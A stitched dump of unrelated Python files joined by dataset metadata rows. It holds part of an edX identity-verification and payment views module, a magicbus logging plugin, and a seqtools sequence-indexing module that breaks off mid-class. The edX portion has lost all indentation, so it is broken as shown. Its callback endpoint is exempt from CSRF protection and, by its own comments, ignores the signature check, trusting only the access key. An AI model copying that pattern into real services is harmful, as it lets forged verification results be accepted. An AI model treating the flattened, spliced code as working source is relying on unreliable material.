request.session['attempting_upgrade'] = (message == self.UPGRADE_MSG)
# Determine the photo verification status
verification_good_until = self._verification_valid_until(request.user)
# get available payment processors
if relevant_course_mode.sku:
try:
processors = ecommerce_api_client(request.user).payment.processors.get()
except Exception as e:
log.info(str(e))
processors = ["cybersource","paypal","stripe"]
else:
# transaction will be conducted using legacy shopping cart
processors = [settings.CC_PROCESSOR_NAME]
default_currency = configuration_helpers.get_value('PAID_COURSE_REGISTRATION_CURRENCY', settings.PAID_COURSE_REGISTRATION_CURRENCY) or ['usd', '$']
# Render the top-level page
context = {
'contribution_amount': contribution_amount,
'course': course,
'course_key': unicode(course_key),
'checkpoint_location': request.GET.get('checkpoint'),
'course_mode': relevant_course_mode,
'default_currency': default_currency,
'courseware_url': courseware_url,
'current_step': current_step,
'disable_courseware_js': True,
'display_steps': display_steps,
'is_active': json.dumps(user_is_active),
'user_email': request.user.email,
'message_key': message,
'platform_name': configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME),
'processors': processors,
'requirements': requirements,
'user_full_name': full_name,
'verification_deadline': verification_deadline or "",
'already_verified': already_verified,
'verification_good_until': verification_good_until,
'capture_sound': staticfiles_storage.url("audio/camera_capture.wav"),
'nav_hidden': True,
'is_ab_testing': 'begin-flow' in request.path,
}
return render_to_response("verify_student/pay_and_verify.html", context)
def add_utm_params_to_url(self, url):
# utm_params is [(u'utm_content', u'course-v1:IDBx IDB20.1x 1T2017'),...
utm_params = [item for item in self.request.GET.items() if 'utm_' in item[0]]
# utm_params is utm_content=course-v1%3AIDBx+IDB20.1x+1T2017&...
utm_params = urllib.urlencode(utm_params, True)
# utm_params is utm_content=course-v1:IDBx+IDB20.1x+1T2017&...
# (course-keys do not have url encoding)
utm_params = urllib.unquote(utm_params)
if utm_params:
if '?' in url:
url = url + '&' + utm_params
else:
url = url + '?' + utm_params
return url
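    # Hedged illustration of add_utm_params_to_url() above (hypothetical
    # values): with request.GET = {'utm_source': 'email', 'page': '2'},
    # 'https://host/checkout?sku=ABC' becomes
    # 'https://host/checkout?sku=ABC&utm_source=email' -- only utm_* keys
    # are kept, and the merged query string is left un-urlencoded.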
def _redirect_if_necessary(
self, message, already_verified, already_paid, is_enrolled, course_key, # pylint: disable=bad-continuation
user_is_trying_to_pay, user, sku # pylint: disable=bad-continuation
):
"""Redirect the user to a more appropriate page if necessary.
In some cases, a user may visit this page with
verification / enrollment / payment state that
we don't anticipate. For example, a user may unenroll
from the course after paying for it, then visit the
"verify now" page to complete verification.
When this happens, we try to redirect the user to
the most appropriate page.
Arguments:
message (string): The messaging of the page. Should be a key
in `MESSAGES`.
already_verified (bool): Whether the user has submitted
a verification request recently.
already_paid (bool): Whether the user is enrolled in a paid
course mode.
is_enrolled (bool): Whether the user has an active enrollment
in the course.
course_key (CourseKey): The key for the course.
Returns:
HttpResponse or None
"""
url = None
course_kwargs = {'course_id': unicode(course_key)}
if already_verified and already_paid:
# If they've already paid and verified, there's nothing else to do,
# so redirect them to the dashboard.
if message != self.PAYMENT_CONFIRMATION_MSG:
url = reverse('dashboard')
elif message in [self.VERIFY_NOW_MSG, self.VERIFY_LATER_MSG, self.PAYMENT_CONFIRMATION_MSG]:
if is_enrolled:
# If the user is already enrolled but hasn't yet paid,
# then the "upgrade" messaging is more appropriate.
if not already_paid:
url = reverse('verify_student_upgrade_and_verify', kwargs=course_kwargs)
else:
# If the user is NOT enrolled, then send him/her
# to the first time verification page.
url = reverse('verify_student_start_flow', kwargs=course_kwargs)
elif message == self.UPGRADE_MSG:
if is_enrolled:
if already_paid:
# If the student has paid, but not verified, redirect to the verification flow.
url = reverse('verify_student_verify_now', kwargs=course_kwargs)
else:
url = reverse('verify_student_start_flow', kwargs=course_kwargs)
if user_is_trying_to_pay and self._get_user_active_status(user) and not already_paid:
# If the user is trying to pay, has activated their account, and the ecommerce service
# is enabled redirect him to the ecommerce checkout page.
ecommerce_service = EcommerceService()
if ecommerce_service.is_enabled(user):
url = ecommerce_service.get_checkout_page_url(sku)
# Redirect if necessary, otherwise implicitly return None
if url is not None:
url = self.add_utm_params_to_url(url)
return redirect(url)
def _get_paid_mode(self, course_key):
"""
Retrieve the paid course mode for a course.
The returned course mode may or may not be expired.
Unexpired modes are preferred to expired modes.
Arguments:
course_key (CourseKey): The location of the course.
Returns:
CourseMode tuple
"""
# Retrieve all the modes at once to reduce the number of database queries
all_modes, unexpired_modes = CourseMode.all_and_unexpired_modes_for_courses([course_key])
# Retrieve the first mode that matches the following criteria:
# * Unexpired
# * Price > 0
# * Not credit
for mode in unexpired_modes[course_key]:
if mode.min_price > 0 and not CourseMode.is_credit_mode(mode):
return mode
# Otherwise, find the first non credit expired paid mode
for mode in all_modes[course_key]:
if mode.min_price > 0 and not CourseMode.is_credit_mode(mode):
return mode
# Otherwise, return None and so the view knows to respond with a 404.
return None
def _display_steps(self, always_show_payment, already_verified, already_paid, course_mode):
"""Determine which steps to display to the user.
Includes all steps by default, but removes steps
if the user has already completed them.
Arguments:
always_show_payment (bool): If True, display the payment steps
even if the user has already paid.
already_verified (bool): Whether the user has submitted
a verification request recently.
already_paid (bool): Whether the user is enrolled in a paid
course mode.
Returns:
list
"""
display_steps = self.ALL_STEPS
remove_steps = set()
if already_verified or not CourseMode.is_verified_mode(course_mode):
remove_steps |= set(self.VERIFICATION_STEPS)
if already_paid and not always_show_payment:
remove_steps |= set(self.PAYMENT_STEPS)
else:
# The "make payment" step doubles as an intro step,
# so if we're showing the payment step, hide the intro step.
remove_steps |= set([self.INTRO_STEP])
return [
{
'name': step,
'title': unicode(self.STEP_TITLES[step]),
}
for step in display_steps
if step not in remove_steps
]
def _requirements(self, display_steps, is_active):
"""Determine which requirements to show the user.
For example, if the user needs to submit a photo
verification, tell the user that she will need
a photo ID and a webcam.
Arguments:
display_steps (list): The steps to display to the user.
is_active (bool): If False, adds a requirement to activate the user account.
Returns:
dict: Keys are requirement names, values are booleans
indicating whether to show the requirement.
"""
all_requirements = {
self.ACCOUNT_ACTIVATION_REQ: not is_active,
self.PHOTO_ID_REQ: False,
self.WEBCAM_REQ: False,
}
# Remove the account activation requirement if disabled via waffle
if is_account_activation_requirement_disabled():
all_requirements.pop(self.ACCOUNT_ACTIVATION_REQ)
display_steps = set(step['name'] for step in display_steps)
for step, step_requirements in self.STEP_REQUIREMENTS.iteritems():
if step in display_steps:
for requirement in step_requirements:
all_requirements[requirement] = True
return all_requirements
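    # Hedged illustration of _requirements() above: with both photo steps
    # displayed and an inactive account (activation waffle switch off),
    # the returned dict is {'account-activation-required': True,
    # 'photo-id-required': True, 'webcam-required': True}.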
def _verification_valid_until(self, user, date_format="%m/%d/%Y"):
"""
Check whether the user has a valid or pending verification.
Arguments:
user:
date_format: optional parameter for formatting datetime
object to string in response
Returns:
datetime object in string format
"""
photo_verifications = SoftwareSecurePhotoVerification.verification_valid_or_pending(user)
# return 'expiration_datetime' of latest photo verification if found,
# otherwise implicitly return ''
if photo_verifications:
return photo_verifications[0].expiration_datetime.strftime(date_format)
return ''
def _check_already_verified(self, user):
"""Check whether the user has a valid or pending verification.
Note that this includes cases in which the user's verification
has not been accepted (either because it hasn't been processed,
or there was an error).
This should return True if the user has done their part:
submitted photos within the expiration period.
"""
return SoftwareSecurePhotoVerification.user_has_valid_or_pending(user)
def _check_enrollment(self, user, course_key):
"""Check whether the user has an active enrollment and has paid.
If a user is enrolled in a paid course mode, we assume
that the user has paid.
Arguments:
user (User): The user to check.
course_key (CourseKey): The key of the course to check.
Returns:
Tuple `(has_paid, is_active)` indicating whether the user
has paid and whether the user has an active account.
"""
enrollment_mode, is_active = CourseEnrollment.enrollment_mode_for_user(user, course_key)
has_paid = False
if enrollment_mode is not None and is_active:
all_modes = CourseMode.modes_for_course_dict(course_key, include_expired=True)
course_mode = all_modes.get(enrollment_mode)
has_paid = (course_mode and course_mode.min_price > 0)
return (has_paid, bool(is_active))
def _response_if_deadline_passed(self, course, deadline_name, deadline_datetime):
"""
Respond with some error messaging if the deadline has passed.
Arguments:
course (Course): The course the user is trying to enroll in.
deadline_name (str): One of the deadline constants.
deadline_datetime (datetime): The deadline.
Returns: HttpResponse or None
"""
if deadline_name not in [self.VERIFICATION_DEADLINE, self.UPGRADE_DEADLINE]:
log.error("Invalid deadline name %s. Skipping check for whether the deadline passed.", deadline_name)
return None
deadline_passed = (
deadline_datetime is not None and
deadline_datetime < datetime.datetime.now(UTC)
)
if deadline_passed:
context = {
'course': course,
'deadline_name': deadline_name,
'deadline': deadline_datetime
}
return render_to_response("verify_student/missed_deadline.html", context)
def checkout_with_ecommerce_service(user, course_key, course_mode, processor):
""" Create a new basket and trigger immediate checkout, using the E-Commerce API. """
course_id = unicode(course_key)
try:
api = ecommerce_api_client(user)
# Make an API call to create the order and retrieve the results
result = api.baskets.post({
'products': [{'sku': course_mode.sku}],
'checkout': True,
'payment_processor_name': processor
})
# Pass the payment parameters directly from the API response.
return result.get('payment_data')
except SlumberBaseException:
params = {'username': user.username, 'mode': course_mode.slug, 'course_id': course_id}
log.exception('Failed to create order for %(username)s %(mode)s mode of %(course_id)s', params)
raise
finally:
audit_log(
'checkout_requested',
course_id=course_id,
mode=course_mode.slug,
processor_name=processor,
user_id=user.id
)
def checkout_with_shoppingcart(request, user, course_key, course_mode, amount):
""" Create an order and trigger checkout using shoppingcart."""
cart = Order.get_cart_for_user(user)
cart.clear()
enrollment_mode = course_mode.slug
CertificateItem.add_to_order(cart, course_key, amount, enrollment_mode)
# Change the order's status so that we don't accidentally modify it later.
# We need to do this to ensure that the parameters we send to the payment system
# match what we store in the database.
# (Ordinarily we would do this client-side when the user submits the form, but since
# the JavaScript on this page does that immediately, we make the change here instead.
# This avoids a second AJAX call and some additional complication of the JavaScript.)
# If a user later re-enters the verification / payment flow, she will create a new order.
cart.start_purchase()
callback_url = request.build_absolute_uri(
reverse("shoppingcart.views.postpay_callback")
)
payment_data = {
'payment_processor_name': settings.CC_PROCESSOR_NAME,
'payment_page_url': get_purchase_endpoint(),
'payment_form_data': get_signed_purchase_params(
cart,
callback_url=callback_url,
extra_data=[unicode(course_key), course_mode.slug]
),
}
return payment_data
@require_POST
@login_required
def create_order(request):
"""
This endpoint is named 'create_order' for backward compatibility, but its
actual use is to add a single product to the user's cart and request
immediate checkout.
"""
course_id = request.POST['course_id']
course_id = CourseKey.from_string(course_id)
donation_for_course = request.session.get('donation_for_course', {})
contribution = request.POST.get("contribution", donation_for_course.get(unicode(course_id), 0))
try:
amount = decimal.Decimal(contribution).quantize(decimal.Decimal('.01'), rounding=decimal.ROUND_DOWN)
except decimal.InvalidOperation:
return HttpResponseBadRequest(_("Selected price is not valid number."))
current_mode = None
sku = request.POST.get('sku', None)
if sku:
try:
current_mode = CourseMode.objects.get(sku=sku)
except CourseMode.DoesNotExist:
log.exception(u'Failed to find CourseMode with SKU [%s].', sku)
if not current_mode:
        # If more than one paid mode (a mode with min_price > 0, e.g.
        # verified/professional/no-id-professional) exists for the course,
        # choose the first one.
paid_modes = CourseMode.paid_modes_for_course(course_id)
if paid_modes:
if len(paid_modes) > 1:
log.warn(u"Multiple paid course modes found for course '%s' for create order request", course_id)
current_mode = paid_modes[0]
# Make sure this course has a paid mode
if not current_mode:
log.warn(u"Create order requested for course '%s' without a paid mode.", course_id)
return HttpResponseBadRequest(_("This course doesn't support paid certificates"))
if CourseMode.is_professional_mode(current_mode):
amount = current_mode.min_price
if amount < current_mode.min_price:
return HttpResponseBadRequest(_("No selected price or selected price is below minimum."))
if current_mode.sku:
# if request.POST doesn't contain 'processor' then the service's default payment processor will be used.
payment_data = checkout_with_ecommerce_service(
request.user,
course_id,
current_mode,
request.POST.get('processor')
)
else:
payment_data = checkout_with_shoppingcart(request, request.user, course_id, current_mode, amount)
if 'processor' not in request.POST:
# (XCOM-214) To be removed after release.
# the absence of this key in the POST payload indicates that the request was initiated from
# a stale js client, which expects a response containing only the 'payment_form_data' part of
# the payment data result.
payment_data = payment_data['payment_form_data']
return HttpResponse(json.dumps(payment_data), content_type="application/json")
class SubmitPhotosView(View):
"""
End-point for submitting photos for verification.
"""
@method_decorator(transaction.non_atomic_requests)
def dispatch(self, *args, **kwargs): # pylint: disable=missing-docstring
return super(SubmitPhotosView, self).dispatch(*args, **kwargs)
@method_decorator(login_required)
@method_decorator(outer_atomic(read_committed=True))
def post(self, request):
"""
Submit photos for verification.
This end-point is used for the following cases:
* Initial verification through the pay-and-verify flow.
* Initial verification initiated from a checkpoint within a course.
* Re-verification initiated from a checkpoint within a course.
POST Parameters:
face_image (str): base64-encoded image data of the user's face.
photo_id_image (str): base64-encoded image data of the user's photo ID.
full_name (str): The user's full name, if the user is requesting a name change as well.
course_key (str): Identifier for the course, if initiated from a checkpoint.
checkpoint (str): Location of the checkpoint in the course.
"""
# If the user already has an initial verification attempt, we can re-use the photo ID
# the user submitted with the initial attempt.
initial_verification = SoftwareSecurePhotoVerification.get_initial_verification(request.user)
# Validate the POST parameters
params, response = self._validate_parameters(request, bool(initial_verification))
if response is not None:
return response
# If necessary, update the user's full name
if "full_name" in params:
response = self._update_full_name(request.user, params["full_name"])
if response is not None:
return response
# Retrieve the image data
# Validation ensures that we'll have a face image, but we may not have
# a photo ID image if this is a reverification.
face_image, photo_id_image, response = self._decode_image_data(
params["face_image"], params.get("photo_id_image")
)
        # If we have a photo ID image, we do not want to use the initial verification image.
if photo_id_image is not None:
initial_verification = None
if response is not None:
return response
# Submit the attempt
attempt = self._submit_attempt(request.user, face_image, photo_id_image, initial_verification)
self._fire_event(request.user, "edx.bi.verify.submitted", {"category": "verification"})
self._send_confirmation_email(request.user)
return JsonResponse({})
def _validate_parameters(self, request, has_initial_verification):
"""
Check that the POST parameters are valid.
Arguments:
request (HttpRequest): The request object.
has_initial_verification (bool): Whether the user has an initial verification attempt.
Returns:
HttpResponse or None
"""
# Pull out the parameters we care about.
params = {
param_name: request.POST[param_name]
for param_name in [
"face_image",
"photo_id_image",
"course_key",
"full_name"
]
if param_name in request.POST
}
# If the user already has an initial verification attempt, then we don't
# require the user to submit a photo ID image, since we can re-use the photo ID
# image from the initial attempt.
# If we don't have an initial verification OR a photo ID image, something has gone
# terribly wrong in the JavaScript. Log this as an error so we can track it down.
if "photo_id_image" not in params and not has_initial_verification:
log.error(
(
"User %s does not have an initial verification attempt "
"and no photo ID image data was provided. "
"This most likely means that the JavaScript client is not "
"correctly constructing the request to submit photos."
), request.user.id
)
return None, HttpResponseBadRequest(
_("Photo ID image is required if the user does not have an initial verification attempt.")
)
# The face image is always required.
if "face_image" not in params:
msg = _("Missing required parameter face_image")
return None, HttpResponseBadRequest(msg)
# If provided, parse the course key and checkpoint location
if "course_key" in params:
try:
params["course_key"] = CourseKey.from_string(params["course_key"])
except InvalidKeyError:
return None, HttpResponseBadRequest(_("Invalid course key"))
return params, None
def _update_full_name(self, user, full_name):
"""
Update the user's full name.
Arguments:
user (User): The user to update.
full_name (unicode): The user's updated full name.
Returns:
HttpResponse or None
"""
try:
update_account_settings(user, {"name": full_name})
except UserNotFound:
return HttpResponseBadRequest(_("No profile found for user"))
except AccountValidationError:
msg = _(
"Name must be at least {min_length} characters long."
).format(min_length=NAME_MIN_LENGTH)
return HttpResponseBadRequest(msg)
def _decode_image_data(self, face_data, photo_id_data=None):
"""
Decode image data sent with the request.
Arguments:
face_data (str): base64-encoded face image data.
Keyword Arguments:
photo_id_data (str): base64-encoded photo ID image data.
Returns:
tuple of (str, str, HttpResponse)
"""
try:
# Decode face image data (used for both an initial and re-verification)
face_image = decode_image_data(face_data)
# Decode the photo ID image data if it's provided
photo_id_image = (
decode_image_data(photo_id_data)
if photo_id_data is not None else None
)
return face_image, photo_id_image, None
except InvalidImageData:
msg = _("Image data is not valid.")
return None, None, HttpResponseBadRequest(msg)
def _submit_attempt(self, user, face_image, photo_id_image=None, initial_verification=None):
"""
Submit a verification attempt.
Arguments:
user (User): The user making the attempt.
face_image (str): Decoded face image data.
Keyword Arguments:
photo_id_image (str or None): Decoded photo ID image data.
initial_verification (SoftwareSecurePhotoVerification): The initial verification attempt.
"""
attempt = SoftwareSecurePhotoVerification(user=user)
# We will always have face image data, so upload the face image
attempt.upload_face_image(face_image)
# If an ID photo wasn't submitted, re-use the ID photo from the initial attempt.
# Earlier validation rules ensure that at least one of these is available.
if photo_id_image is not None:
attempt.upload_photo_id_image(photo_id_image)
elif initial_verification is None:
# Earlier validation should ensure that we never get here.
log.error(
"Neither a photo ID image or initial verification attempt provided. "
"Parameter validation in the view should prevent this from happening!"
)
# Submit the attempt
attempt.mark_ready()
attempt.submit(copy_id_photo_from=initial_verification)
return attempt
def _send_confirmation_email(self, user):
"""
Send an email confirming that the user submitted photos
for initial verification.
"""
context = {
'full_name': user.profile.name,
'platform_name': configuration_helpers.get_value("PLATFORM_NAME", settings.PLATFORM_NAME)
}
subject = _("Verification photos received")
message = render_to_string('emails/photo_submission_confirmation.txt', context)
from_address = configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
to_address = user.email
try:
send_mail(subject, message, from_address, [to_address], fail_silently=False)
except: # pylint: disable=bare-except
# We catch all exceptions and log them.
# It would be much, much worse to roll back the transaction due to an uncaught
# exception than to skip sending the notification email.
log.exception("Could not send notification email for initial verification for user %s", user.id)
def _fire_event(self, user, event_name, parameters):
"""
Fire an analytics event.
Arguments:
user (User): The user who submitted photos.
event_name (str): Name of the analytics event.
parameters (dict): Event parameters.
Returns: None
"""
if settings.LMS_SEGMENT_KEY:
tracking_context = tracker.get_tracker().resolve_context()
context = {
'ip': tracking_context.get('ip'),
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
analytics.track(user.id, event_name, parameters, context=context)
@require_POST
@csrf_exempt # SS does its own message signing, and their API won't have a cookie value
def results_callback(request):
"""
Software Secure will call this callback to tell us whether a user is
verified to be who they said they are.
"""
body = request.body
try:
body_dict = json.loads(body)
except ValueError:
log.exception("Invalid JSON received from Software Secure:\n\n{}\n".format(body))
return HttpResponseBadRequest("Invalid JSON. Received:\n\n{}".format(body))
if not isinstance(body_dict, dict):
log.error("Reply from Software Secure is not a dict:\n\n{}\n".format(body))
return HttpResponseBadRequest("JSON should be dict. Received:\n\n{}".format(body))
headers = {
"Authorization": request.META.get("HTTP_AUTHORIZATION", ""),
"Date": request.META.get("HTTP_DATE", "")
}
VERIFY_STUDENT = get_verify_student_settings()
api_access_key = VERIFY_STUDENT["API_ACCESS_KEY"]
api_secret_key = VERIFY_STUDENT["API_SECRET_KEY"]
body_for_signature = {"EdX-ID": body_dict["EdX-ID"]}
has_valid_signature(
"POST",
headers,
body_for_signature,
api_access_key,
api_secret_key
)
_response, access_key_and_sig = headers["Authorization"].split(" ")
access_key = access_key_and_sig.split(":")[0]
# This is what we should be doing...
#if not sig_valid:
# return HttpResponseBadRequest("Signature is invalid")
# This is what we're doing until we can figure out why we disagree on sigs
if access_key != api_access_key:
return HttpResponseBadRequest("Access key invalid")
receipt_id = body_dict.get("EdX-ID")
result = body_dict.get("Result")
reason = body_dict.get("Reason", "")
error_code = body_dict.get("MessageType", "")
try:
attempt = SoftwareSecurePhotoVerification.objects.get(receipt_id=receipt_id)
except SoftwareSecurePhotoVerification.DoesNotExist:
log.error("Software Secure posted back for receipt_id %s, but not found", receipt_id)
return HttpResponseBadRequest("edX ID {} not found".format(receipt_id))
if result == "PASS":
log.debug("Approving verification for %s", receipt_id)
attempt.approve()
status = "approved"
elif result == "FAIL":
log.debug("Denying verification for %s", receipt_id)
attempt.deny(json.dumps(reason), error_code=error_code)
status = "denied"
elif result == "SYSTEM FAIL":
log.debug("System failure for %s -- resetting to must_retry", receipt_id)
attempt.system_error(json.dumps(reason), error_code=error_code)
status = "error"
log.error("Software Secure callback attempt for %s failed: %s", receipt_id, reason)
else:
log.error("Software Secure returned unknown result %s", result)
return HttpResponseBadRequest(
"Result {} not understood. Known results: PASS, FAIL, SYSTEM FAIL".format(result)
)
return HttpResponse("OK!")
class ReverifyView(View):
"""
Reverification occurs when a user's initial verification is denied
or expires. When this happens, users can re-submit photos through
the re-verification flow.
Unlike in-course reverification, this flow requires users to submit
*both* face and ID photos. In contrast, during in-course reverification,
students submit only face photos, which are matched against the ID photo
the user submitted during initial verification.
"""
@method_decorator(login_required)
def get(self, request):
"""
Render the reverification flow.
Most of the work is done client-side by composing the same
Backbone views used in the initial verification flow.
"""
status, __ = SoftwareSecurePhotoVerification.user_status(request.user)
expiration_datetime = SoftwareSecurePhotoVerification.get_expiration_datetime(request.user)
can_reverify = False
if expiration_datetime:
if SoftwareSecurePhotoVerification.is_verification_expiring_soon(expiration_datetime):
# The user has an active verification, but the verification
# is set to expire within "EXPIRING_SOON_WINDOW" days (default is 4 weeks).
# In this case user can resubmit photos for reverification.
can_reverify = True
        # If the user has no initial verification, or if the verification
        # is still ongoing ('pending') or has expired, allow the user to
        # submit photo verification.
# A photo verification is marked as 'pending' if its status is either
# 'submitted' or 'must_retry'.
if status in ["none", "must_reverify", "expired", "pending"] or can_reverify:
context = {
"user_full_name": request.user.profile.name,
"platform_name": configuration_helpers.get_value('PLATFORM_NAME', settings.PLATFORM_NAME),
"capture_sound": staticfiles_storage.url("audio/camera_capture.wav"),
}
return render_to_response("verify_student/reverify.html", context)
else:
context = {
"status": status
}
return render_to_response("verify_student/reverify_not_allowed.html", context)
|
agpl-3.0
| -2,058,498,461,421,042,700
| 39.008078
| 155
| 0.633919
| false
| 4.369266
| false
| false
| false
|
cherrypy/magicbus
|
magicbus/plugins/loggers.py
|
1
|
1912
|
"""Logging plugins for magicbus."""
from magicbus.compat import ntob, unicodestr
import datetime
import sys
from magicbus.plugins import SimplePlugin
class StreamLogger(SimplePlugin):
default_format = '[%(timestamp)s] (Bus %(bus)s) %(message)s\n'
def __init__(self, bus, stream, level=None, format=None, encoding='utf-8'):
SimplePlugin.__init__(self, bus)
self.stream = stream
self.level = level
self.format = format or self.default_format
self.encoding = encoding
def log(self, msg, level):
if self.level is None or self.level <= level:
params = {
'timestamp': ntob(datetime.datetime.now().isoformat()),
'bus': self.bus.id,
'message': msg,
'level': level
}
complete_msg = self.format % params
if self.encoding is not None:
if isinstance(complete_msg, unicodestr):
complete_msg = complete_msg.encode(self.encoding)
self.stream.write(complete_msg)
self.stream.flush()
class StdoutLogger(StreamLogger):
def __init__(self, bus, level=None, format=None, encoding='utf-8'):
StreamLogger.__init__(self, bus, sys.stdout, level, format, encoding)
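# Minimal usage sketch (illustrative; assumes the SimplePlugin.subscribe()
# wiring from magicbus and a bus instance created elsewhere):
#     logger = StdoutLogger(bus)
#     logger.subscribe()   # binds log() to the bus's 'log' channel
#     bus.log('hello')     # -> "[<iso timestamp>] (Bus <id>) hello"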
class StderrLogger(StreamLogger):
def __init__(self, bus, level=None, format=None, encoding='utf-8'):
StreamLogger.__init__(self, bus, sys.stderr, level, format, encoding)
class FileLogger(StreamLogger):
def __init__(self, bus, filename=None, file=None,
                 level=None, format=None, encoding='utf-8'):
self.filename = filename
if file is None:
if filename is None:
raise ValueError('Either file or filename MUST be supplied.')
file = open(filename, 'ab')
StreamLogger.__init__(self, bus, file, level, format, encoding)
|
bsd-3-clause
| 5,570,195,874,519,741,000
| 30.866667
| 79
| 0.599895
| false
| 4.059448
| false
| false
| false
|
nlgranger/LazyProc
|
seqtools/indexing.py
|
1
|
12939
|
from numbers import Integral
import itertools
import bisect
from array import array
from future.builtins import range
from .utils import isint, basic_getitem, basic_setitem, normalize_slice, \
get_logger
class Arange:
def __init__(self, start, stop=None, step=None):
if stop is None and step is None:
stop = start
start = 0
if step is None:
step = 1
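        # Normalize the bounds (sketch of the arithmetic below): an empty
        # range collapses to start == stop; otherwise stop is rounded to
        # start + step * numel so that (stop - start) is an exact multiple
        # of step, which keeps __len__ a plain floor division.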
if (stop - start) / step < 0:
stop = start
size = abs(stop - start) - 1
abs_step = abs(step)
numel = (size + abs_step - (size % abs_step)) // abs_step
stop = start + step * numel
self.start, self.stop, self.step = start, stop, step
def __len__(self):
return abs(self.stop - self.start) // abs(self.step)
def __iter__(self):
return iter(range(self.start, self.stop, self.step))
def __getitem__(self, key):
if isinstance(key, slice):
start, stop, step = normalize_slice(
key.start, key.stop, key.step, len(self))
numel = abs(stop - start) // abs(step)
start = self.start + self.step * start
step = self.step * step
stop = start + step * numel
return Arange(start, stop, step)
elif not isinstance(key, Integral):
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
return self.start + self.step * key
def arange(start, stop=None, step=None):
"""Sequential equivalent of Python built-in :class:`python:range`."""
return Arange(start, stop, step)
class Gathering(object):
def __init__(self, sequence, indexes):
if isinstance(sequence, Gathering): # optimize nested subsets
indexes = array('l', (sequence.indexes[i] for i in indexes))
sequence = sequence.sequence
self.sequence = sequence
self.indexes = indexes
def __len__(self):
return len(self.indexes)
def __iter__(self):
for i in self.indexes:
yield self.sequence[i]
def __getitem__(self, key):
if isinstance(key, slice):
return gather(self.sequence, self.indexes[key])
elif isint(key):
if key < -len(self) or key >= len(self):
raise IndexError(
self.__class__.__name__ + " index out of range")
if key < 0:
key = len(self) + key
return self.sequence[self.indexes[key]]
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def __setitem__(self, key, value):
if isinstance(key, slice):
indexes = self.indexes[key]
if len(indexes) != len(value):
raise ValueError(self.__class__.__name__ + " only support "
"one-to-one assignment")
for i, val in zip(indexes, value):
self.sequence[i] = val
elif isint(key):
if key < -len(self) or key >= len(self):
raise IndexError(
self.__class__.__name__ + " index out of range")
if key < 0:
key = len(self) + key
self.sequence[self.indexes[key]] = value
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def gather(sequence, indexes):
"""Return a view on the sequence reordered by indexes.
.. image:: _static/gather.png
:alt: gather
:width: 15%
:align: center
Example:
>>> arr = ['d', 'e', 'h', 'l', 'o', 'r', 'w', ' ']
>>> idx = [2, 1, 3, 3, 4, 7, 6, 4, 5, 3, 0]
>>> list(seqtools.gather(arr, idx))
['h', 'e', 'l', 'l', 'o', ' ', 'w', 'o', 'r', 'l', 'd']
"""
return Gathering(sequence, indexes)
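# Composition note (illustrative example, not from the original module):
# nested gather() views collapse into a single index table instead of
# stacking lookups, e.g.
#     >>> v = gather(gather(list('abcdef'), [5, 4, 3, 2, 1, 0]), [0, 2, 4])
#     >>> list(v)
#     ['f', 'd', 'b']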
def take(sequence, indexes):
"""Alias for :func:`seqtools.gather`."""
return gather(sequence, indexes)
def reindex(sequence, indexes):
logger = get_logger(__name__)
logger.warning(
"Call to deprecated function reindex, use gather instead",
category=DeprecationWarning,
stacklevel=2)
return gather(sequence, indexes)
class Cycle:
def __init__(self, sequence, size):
self.sequence = sequence
self.size = int(size)
def __len__(self):
return self.size
def __iter__(self):
i = 0
while True:
for v in self.sequence:
yield v
i += 1
if i == self.size:
return
@basic_getitem
def __getitem__(self, key):
return self.sequence[key % len(self.sequence)]
@basic_setitem
def __setitem__(self, key, value):
self.sequence[key % len(self.sequence)] = value
class InfiniteCycle:
def __init__(self, sequence):
self.sequence = sequence
def __iter__(self):
while True:
for v in self.sequence:
yield v
def __getitem__(self, key):
if isinstance(key, slice):
start, stop, step = key.start, key.stop, key.step
if start is None:
start = 0
if start < 0 or stop is None or stop < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
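            # Shift the window back by a whole number of cycles so the
            # slice can be delegated to a finite Cycle of length `stop`.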
offset = start - start % len(self.sequence)
start -= offset
stop -= offset
return Cycle(self.sequence, stop)[start:stop:step]
elif isint(key):
if key < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
return self.sequence[key % len(self.sequence)]
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def cycle(sequence, limit=None):
"""Return repeated view of a sequence.
Args:
sequence (Sequence): The sequence to be repeated.
limit (Optional[int]): An optional size limit.
.. image:: _static/cycle.png
:alt: collate
:width: 10%
:align: center
Example:
>>> data = ['a', 'b', 'c']
>>> loop = seqtools.cycle(data)
>>> loop[3]
'a'
>>> loop[3 * 10 ** 9 + 1] # unbounded sequence
'b'
>>> loop = seqtools.cycle(data, 7)
>>> list(loop)
['a', 'b', 'c', 'a', 'b', 'c', 'a']
"""
return InfiniteCycle(sequence) if limit is None else Cycle(sequence, limit)
class Interleaving(object):
def __init__(self, sequences):
offsets_in = [0] # end of sequences in input indexing
offsets_out = [0] # end of sequences in output indexing
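        # Sketch of the bookkeeping: sequences are visited from shortest to
        # longest, and each time the shortest remaining one runs out the
        # number of interleaved sequences drops by one. offsets_in/offsets_out
        # record the input/output positions of each exhaustion point so that
        # _convert_1d_key can map an output index back to (sequence, offset)
        # with a single bisect.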
whose_offset = sorted(range(len(sequences)),
key=lambda k: len(sequences[k]))
for i, n_seq_left in zip(whose_offset, range(len(sequences), 0, -1)):
n_new_out_items = (len(sequences[i]) - offsets_in[-1]) * n_seq_left
offsets_out.append(offsets_out[-1] + n_new_out_items)
offsets_in.append(len(sequences[i]))
self.sequences = sequences
self.n_seqs = len(sequences)
self.offsets_in = array('i', offsets_in)
self.offsets_out = array('i', offsets_out)
self.remaining_seqs = [sorted(whose_offset[i:])
for i in range(len(sequences))]
def __len__(self):
return sum(map(len, self.sequences))
def _convert_1d_key(self, key):
# given index in interleaved sequences, return sequence and offset
n_exhausted = bisect.bisect(self.offsets_out, key) - 1
n_remaining_seqs = self.n_seqs - n_exhausted
key -= self.offsets_out[n_exhausted]
seq = self.remaining_seqs[n_exhausted][key % n_remaining_seqs]
idx = self.offsets_in[n_exhausted] + key // n_remaining_seqs
return seq, idx
def __iter__(self):
